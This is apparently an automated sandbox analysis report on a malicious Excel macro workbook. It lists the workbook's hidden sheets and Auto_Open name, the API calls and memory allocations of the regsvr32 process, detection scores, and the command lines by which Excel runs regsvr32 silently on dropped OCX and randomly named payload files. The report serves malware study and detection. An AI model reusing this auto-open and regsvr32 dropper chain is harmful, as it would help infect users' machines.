Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0030A9CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D50CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EFECB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D82D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D303A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D364E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008F1E49
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D8844
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E4E54
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008F0E7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008F13A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D8FE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E8131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D4B40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008ED15E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E416E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D188C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E3E89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E9285
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EA683
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E7098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E6E97
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E3094
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008ED4AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DD4BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DAEBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E66C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EEEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DA4DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EFAD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E86EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DC4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E8EF8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DE4F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D22F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E9A0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008F1A0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008F0A01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D9C1B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D7013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DCA3C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E7E3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E3231
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E604B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D1A5F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DE65A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E9054
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D806B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D186B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D958A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E3983
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E2783
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E7B9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E519C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E6998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EF9AF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E35A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008ECFA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008F23B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DA9CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D1DCA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008F1FC7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EF5D9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E17D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EE5ED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DCDE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D71E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008F05F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EF7F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E490E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EAF0B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DED0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E0503
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E2B1F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EA916
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DBB14
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D2710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D4313
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EDF2B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E1B29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D2F36
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E7730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D9343
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D3F5A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008DC151
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EE168
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008E8966
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008D7761
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_008EBD63
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E303A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F4E54
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E364E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00200E7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E8844
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00201E49
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E82D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E50CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FFECB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F8131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FD15E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E4B40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F416E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_002013A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E8FE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E9C1B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E7013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F9A0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00200A01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F7E3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001ECA3C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00201A0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F3231
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E1A5F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EE65A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F9054
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F604B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E806B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E186B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F7098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F6E97
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F3094
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E188C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F3E89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F9285
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FA683
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001ED4BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EAEBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FD4AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EA4DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FFAD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F66C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FEEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F8EF8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E22F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EE4F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F86EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EC4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F2B1F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FA916
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EBB14
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E4313
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E2710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F490E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FAF0B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EED0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F0503
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E2F36
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F7730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FDF2B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F1B29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E3F5A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EC151
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E9343
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FE168
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F8966
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FBD63
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E7761
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F7B9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F519C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F6998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E958A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_002023B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F3983
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F2783
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FF9AF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F35A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FCFA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FF5D9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001F17D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001EA9CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E1DCA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_002005F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00201FC7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FF7F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001FE5ED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001E71E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_001ECDE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026303A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00280E7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00281E49
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00268844
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026364E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00274E54
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002650CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0027FECB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002682D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00278131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0027416E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00264B40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0027D15E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002813A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00268FE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00273231
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00277E3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026CA3C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00281A0A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00280A01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00279A0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00267013
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00269C1B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026806B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026186B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0027604B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00279054
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00261A5F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026E65A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0027D4AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026D4BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026AEBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00279285
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0027A683
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026188C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00273E89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00276E97
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00273094
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00277098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026C4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002786EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002622F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026E4F5

Source: 8833.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Documento.xlsm	Macro extractor: Sheet name: Br1
Source: Documento.xlsm	Macro extractor: Sheet name: Br2
Source: Documento.xlsm	Macro extractor: Sheet name: Br2
Source: Documento.xlsm	Macro extractor: Sheet name: EFWFSFG
Source: Documento.xlsm	Macro extractor: Sheet name: EFWFSFG
Source: Documento.xlsm	Macro extractor: Sheet name: Br1

Source: BRqk58WkNweubruYwrLOt[1].dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: BRqk58WkNweubruYwrLOt[1].dll.0.dr	Static PE information: Resource name: None type: GLS_BINARY_LSB_FIRST
Source: xxw1.ocx.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xxw1.ocx.0.dr	Static PE information: Resource name: None type: GLS_BINARY_LSB_FIRST

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527"/><workbookPr defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\File\23f\Cir-ZV\CIR\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{39997D78-22C7-4743-8ECE-3023C34473AE}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Grrr1" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="11" r:id="rId2"/><sheet name="Sbrr1" sheetId="3" state="hidden" r:id="rId3"/><sheet name="EFWFSFG" sheetId="8" state="hidden" r:id="rId4"/><sheet name="Br1" sheetId="4" state="hidden" r:id="rId5"/><sheet name="Br2" sheetId="5" state="hidden" r:id="rId6"/></sheets><definedNames><definedName name="DDDDD1">#REF!</definedName><definedName name="DDWD">EFWFSFG!$D$15</definedName><definedName name="DDWD1">EFWFSFG!$D$17</definedName><definedName name="DDWD2">EFWFSFG!$D$19</definedName><definedName name="DDWD3">EFWFSFG!$D$21</definedName><definedName name="DDWD4">EFWFSFG!$D$23</definedName><definedName name="DDWD8">EFWFSFG!$D$13</definedName><definedName name="KKLD8">#REF!</definedName><definedName name="_xlnm.Auto_Open">EFWFSFG!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000F3A0 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetWindowsDirectoryA,GetSystemDirectoryA,_strcspn,TerminateThread,SendMessageA,ExitWindowsEx,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000FA35 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,TerminateThread,SendMessageA,ExitWindowsEx,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000FAC4 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,TerminateThread,SendMessageA,ExitWindowsEx,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000FFB0 SendMessageA,SendMessageA,TerminateThread,SendMessageA,ExitWindowsEx,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001005E SendMessageA,SendMessageA,TerminateThread,SendMessageA,ExitWindowsEx,

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Lublsqnpkfxznyn\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1003D219 appears 43 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1003D578 appears 76 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10001470 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 100171AA appears 37 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1003D1E6 appears 172 times

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Documento.xlsm

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@19/11@1/45

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10009DB0 CreateWindowExW,CreateWindowExW,GetLastError,ShowWindow,ShowWindow,CreateWindowExA,ShowWindow,CreateWindowExW,GetLastError,ShowWindow,CreateWindowExA,ShowWindow,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,_printf,

Source: Documento.xlsm	Virustotal: Detection: 40%
Source: Documento.xlsm	ReversingLabs: Detection: 39%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"
